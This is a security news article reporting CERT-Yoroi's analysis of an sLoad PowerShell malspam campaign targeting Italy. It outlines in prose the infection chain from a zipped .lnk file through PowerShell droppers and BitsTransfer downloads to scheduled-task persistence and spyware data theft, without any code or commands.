The SLoad Powershell malspam is expanding to Italy
A new malspam campaign hit Italy in this days, threat actors are spreading a new variant of a powerful downloader named sLoad.
sLoad is a sophisticated script, used in the past to deliver different types of malware such as the dreaded “Ramnit banker”.
“In the past months CERT-Yoroi observed an emerging attack pattern targeting its constituency. These series of malicious email messages shared common techniques may be likely related to a single threat group starting its operation against the Italian cyber panorama.” reads the analysis published by Yoroi.
“It is still not clear if these attack attempts may be originated by a any well established cybercrime group modifying its TTP or a completely new one, however CERT-Yoroi is tracking this threat with the internal codename “Sload-ITA” (TH-163) .”
sLoad implements a broad range of capabilities including the ability to take screenshots, read the list of running process, exfiltrate DNS cache, exfiltrate outlook e-mail and other typical spyware functionalities.
As usual, it comes as a zip file attached to an e-mail, this file contains two elements:
- A fake shortcut to directory (.lnk file);
- Legitimate image flagged as hidden.
It is strange that the image is not used into the malware’s workflow, but the link file starts a complex infection chain, as shown in the following figure:
First of all, the .lnk file runs a first PowerShell activator, which searches a file named: “documento-aggiornato-novembre-*.zip”.
Then, if the .zip file exists, the PowerShell script extracts and runs a portion of a code present at the end of the same file. Once the PowerShell script has been extracted, it runs another Powershell script that acts as a subsequent dropper in the attack chain.
This ps code abuses the BitsTransfer windows functionality to download two important files: config.ini and web.ini that contains the final sLoad stage.
The malicious code gains persistence using a task defined into System Task Scheduler that runs a Visual Basic script.
At the end, when sLoad is started, it periodically takes screenshots, gathers system’s information and sends other data to the C2 .
Technical details, including IoCs and Yara Rules, about the sLoad malware are available on the Yoroi blog.
|
(Security Affairs – malspam, malware)
The post The SLoad Powershell malspam is expanding to Italy appeared first on Security Affairs.